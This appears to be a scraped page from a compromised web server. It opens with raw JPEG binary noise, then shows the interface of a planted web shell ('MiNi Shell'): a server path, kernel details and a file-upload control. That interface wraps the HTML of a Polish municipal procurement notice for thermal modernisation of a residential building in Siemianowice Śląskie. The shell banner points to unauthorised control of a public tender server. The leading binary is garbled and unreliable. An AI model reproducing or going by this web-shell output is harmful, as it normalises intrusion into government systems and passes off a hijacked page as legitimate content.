JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220125/0003385602-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa efektywności energetycznej w budynkach będących własnością miasta Siemianowice Śląskie – etap 4 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Siemianowice Śląskie-Urząd Miasta Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255453</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pz_sienkiewicza@um.siemianowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.siemianowice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa efektywności energetycznej w budynkach będących własnością miasta Siemianowice Śląskie – etap 4 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-843b26b0-7dbe-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00033856</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00007218/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.41 Poprawa efektywności energetycznej budynków mieszkalnych w gminie Siemianowice Śląskie ETAP IV</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Infrastruktura i Środowisko 2014-2020 / Oś Priorytetowa I: Zmniejszenie emisyjności gospodarki / Działanie 1.7: Kompleksowa likwidacja niskiej emisji na terenie województwa śląskiego / Poddziałanie: 1.7.1 Wspieranie efektywności energetycznej w budynkach mieszkalnych w województwie śląskim </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umsiemianowice.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umsiemianowice.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej tj.:<br/>1.1. Platformy do elektronicznej obsługi zamówień (zwanej dalej: „Platformą”) dostępnej pod adresem:<br/>https://umsiemianowice.logintrade.net/ albo<br/>1.2. poczty elektronicznej- pz_sienkiewicza@um.siemianowice.pl z zastrzeżeniem, iż Ofertę wraz z<br/>załącznikami należy złożyć wyłącznie za pośrednictwem Platformy, o której mowa w ppkt 1.1. powyżej.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie. Wykonawca posiadający konto na Platformie ma możliwość złożenia,<br/>wycofania oferty oraz składania wniosków o wyjaśnienie treści SWZ.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>zostały opisane w rozdziale XI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1 z późn. zm.), dalej „RODO”, oraz w art. 19 ust. 1 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (j.t. Dz.U. 2021 r. poz. 1129, z późn.zm.), dalej „Pzp”, Zamawiający<br/>informuje, że:<br/>1. administratorem Pana/Pani danych osobowych jest Prezydent Miasta Siemianowice Śląskie z<br/>siedzibą w Siemianowicach Śląskich, przy ul. Jana Pawła II 10;<br/>2. Inspektor Ochrony Danych Osobowych ma swoją siedzibę w Urzędzie Miasta Siemianowice Śląskie<br/>przy ul. Jana Pawła II 10, e-mail: iod@um.siemianowice.pl, tel. 32 760 52 82;<br/>3. Pana/Pani dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn.: Poprawa efektywności<br/>energetycznej w budynkach będących własnością miasta Siemianowice Śląskie – etap 4,<br/>prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji;<br/>4. odbiorcami Pana/Pani danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp;<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede<br/>wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba<br/>że przepisy szczególne stanowią inaczej;<br/>6. obowiązek podania przez Pana/Panią danych osobowych bezpośrednio Pana/Panią dotyczących<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;<br/>7. w odniesieniu do Pana/Pani danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. posiada Pan/Pani:<br/>a. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pana/Pani dotyczących;<br/>b. w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1-3 RODO, zamawiający działając na podstawie art. 75<br/>Pzp może żądać od osoby, występującej z żądaniem wskazania dodatkowych informacji mających w<br/>szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia.<br/>c. na podstawie art. 16 RODO prawo do sprostowania Pana/Pani danych osobowych- z zastrzeżeniem<br/>przepisów art. 19 ust. 2 Pzp oraz art. 76 Pzp;<br/>d. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przepisu art. 19 ust.<br/>3 Pzp oraz art. 74 ust. 3 Pzp;<br/>e. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2,<br/>Warszawa), gdy uznają Pan/Pani, że przetwarzanie danych osobowych Pana/Pani dotyczących<br/>narusza przepisy RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RL.271.4.00002.2021, ZP.rp.01.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest wykonanie termomodernizacji budynku mieszkalnego<br/>znajdującego się przy ulicy Sienkiewicza 6 w Siemianowicach Śląskich w ramach projektu:<br/>Program Operacyjny Infrastruktura i Środowisko 2014-2020 / Oś Priorytetowa I: Zmniejszenie<br/>emisyjności gospodarki / Działanie 1.7: Kompleksowa likwidacja niskiej emisji na terenie<br/>województwa śląskiego / Poddziałanie: 1.7.1 Wspieranie efektywności energetycznej w<br/>budynkach mieszkalnych w województwie śląskim.<br/>2) Zakres robót obejmuje w szczególności:<br/>a) wykonanie wymiany stolarki drzwiowej wejściowej do budynku,<br/>b) wykonanie częściowej wymiany stolarki okiennej,<br/>c) wykonanie izolacji pionowej ścian<br/>d) wykonanie izolacji pionowej ścian fundamentowych do wysokości cokołu oraz dodatkowe<br/>osłonięcie folią kubełkową pod poziomem terenu,<br/>e) wykonanie nowego pokrycia dachu z styropapy,<br/>f) uzupełnienie lub wymianę orynnowania, wymianę obróbek blacharskich i wykonanie nowych<br/>parapetów,<br/>g) częściowe przemurowanie kominów ponad dachem, wykonanie nowych czap betonowych i<br/>ocieplenie,<br/>h) wykonanie nowego wyłazu dachowego,<br/>i) wykonanie oświetlenia zewnętrznego budynku.<br/>3) Szczegółowe określenie przedmiotu zamówienia obejmuje<br/>a) Dokumentacja projektowa – (Dodatek nr 3 do SWZ),<br/>b) Przedmiar robót – (Dodatek nr 4 do SWZ),<br/>c) STWiOR – (Dodatek nr 5 do SWZ),<br/>d) Projektowane postanowienia umowy – (Dodatek nr 6 do SWZ),<br/>– zwane dalej „Dokumentacją”<br/>4) Nie przewiduje się zmian konstrukcyjnych w budynkach oraz zmian zagospodarowania<br/>terenu.<br/>5) Zamawiający zastrzega, że prace będą wykonywane na czynnym, zamieszkałym budynku.<br/>Zalecane jest aby prace powodujące duży hałas (np. wiercenie, kucie, etc.) lub kolidujące z<br/>funkcjonowaniem budynków były wykonywane od poniedziałku do piątku w godzinach 7.00-<br/>.18.00 a w przypadku braku takiej możliwości, np. ze względu na technologię wykonania lub<br/>konieczność zachowania ciągłości robót, były wykonywane po uprzednich ustaleniach z<br/>Inspektorem nadzoru. W czasie wykonywania robót, Wykonawca jest zobowiązany wygrodzić i<br/>utrzymywać teren budowy w stanie wolnym od nadmiernych przeszkód komunikacyjnych,<br/>składować wszelkie urządzenia pomocnicze, sprzęt i materiały w ustalonych miejscach i należytym porządku oraz usuwać zbędne przedmioty z terenu budowy. Wykonawca jest<br/>zobowiązany, na bieżąco porządkować i zabezpieczać obszar prowadzonych prac oraz<br/>informować mieszkańców budynku o ewentualnych niedogodnościach.<br/>6) Zamawiający opisał przedmiot zamówienia bez wskazania znaków towarowych, patentów lub<br/>pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkt lub usługi<br/>dostarczane przez konkretnego wykonawcę.<br/>Jeżeli wykonawca stwierdzi, że przedmiot zamówienia został opisany w sposób, o którym mowa<br/>w art.99 ust.5 ustawy, tj. zostało wskazane pochodzenie (marka, znak towarowy, producent,<br/>dostawca) materiałów, a nie podano kryteriów stosowanych w celu oceny równoważności,<br/>powinien zwrócić się do Zamawiającego o wskazanie, jakie kryteria będą stosowane w celu<br/>oceny równoważności.<br/>Jeżeli w Dokumentacji opisanej powyżej znajdą się odniesienia do norm, ocen technicznych,<br/>specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1<br/>pkt 2 oraz ust. 3 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym.<br/>Użycie w Dokumentacji danej normy, oceny technicznej, specyfikacji technicznych i systemu<br/>referencji technicznej ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w<br/>stosunku do określonego materiału/urządzenia/produktu.<br/>7) Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie<br/>przez Wykonawców, o których mowa w art. 94 ustawy Pzp, tj. mających status zakładu pracy<br/>chronionej, spółdzielnie socjalne oraz innych wykonawców, których głównym celem lub głównym<br/>celem działalności ich wyodrębnionych organizacyjnie jednostek, które będą realizowały<br/>zamówienie, jest społeczna i zawodowa integracja osób społecznie marginalizowanych.<br/>8) Wybrany Wykonawca udzieli Zamawiającemu na przedmiot zamówienia gwarancji i rękojmi<br/>na okres zgodny z ofertą Wykonawcy, jednak nie krótszy niż 60 miesięcy, licząc od dnia<br/>następnego po dniu protokolarnego odbioru bez zastrzeżeń całości przedmiotu zamówienia.<br/>9) Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych<br/>w projektowanych postanowieniach umowy (Dodatek nr 6 do SWZ).<br/>10) Zamawiający w opisie przedmiotu zamówienia uwzględnił wymagania w zakresie<br/>dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich<br/>użytkowników, o których mowa art. 100 ust. 1 Pzp.<br/>11) Zamawiający w opisie przedmiotu zamówienia nie określił wymagań dotyczących wydajności<br/>lub funkcjonalności, o których mowa w art. 101 ust. 1 pkt 1 Pzp.<br/>12) Zamawiający nie żąda od Wykonawcy etykiety oraz nie wskazuje mających zastosowanie<br/>wymagań określonej etykiety, o których mowa w art.104 Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o<br/>następujące kryteria:<br/>a) cena brutto (waga - 60%), 1%=1 pkt<br/>b) okres gwarancji i rękojmi (waga - 40%) 1%=1pkt,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1) Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust.1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych w SWZ przez<br/>Zamawiającego<br/>Uwaga:<br/>Zamawiający żąda Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art.125 ust.1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego, zgodnie z §2 ust.1 pkt 7 oraz §3 rozporządzenia Ministra Rozwoju,<br/>Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku zastosowania rozwiązań równoważnych w rozumieniu art. 101 ust. 4 ustawy,<br/>Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz z ofertą<br/>dokumentów potwierdzających, że oferowane rozwiązania równoważne spełniają wymagania<br/>Zamawiającego opisane w przedmiocie zamówienia.<br/>Jeżeli Wykonawca nie złoży ww. dokumentów lub złożone dokumenty będą niekompletne (nie<br/>potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu<br/>zamówienia) Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenia i dokumenty składane wraz z ofertą.<br/>1.1. Ofertę należy złożyć, pod rygorem nieważności, w formie elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym. Ofertę należy sporządzić zgodnie ze wzorem stanowiącym<br/>Dodatek nr 1 do SWZ.<br/>1.2. Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu w zakresie<br/>wskazanym w Rozdziale IX SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw<br/>wykluczenia na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki<br/>dowodowe, wskazane w rozdziale X ust. 4 SWZ. Oświadczenie należy złożyć zgodnie ze<br/>wzorem stanowiącym Dodatek nr 2 do SWZ.<br/>1.3. Zamawiający nie określił, szczegółowych warunków udziału w postępowaniu, wobec<br/>powyższego nie żąda złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu.<br/>1.4. Wykonawca składa oświadczenie, o którym mowa w pkt. 1.2. powyżej w oryginale w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do<br/>reprezentowania wykonawcy zgodnie z formą reprezentacji określoną w dokumencie, o którym<br/>mowa w ust. 2 pkt 2.1. poniżej.<br/>1.5. Oświadczenie, o którym mowa w pkt. 1.2 składają odrębnie wykonawca/każdy spośród<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku<br/>oświadczenie potwierdza brak podstaw wykluczenia 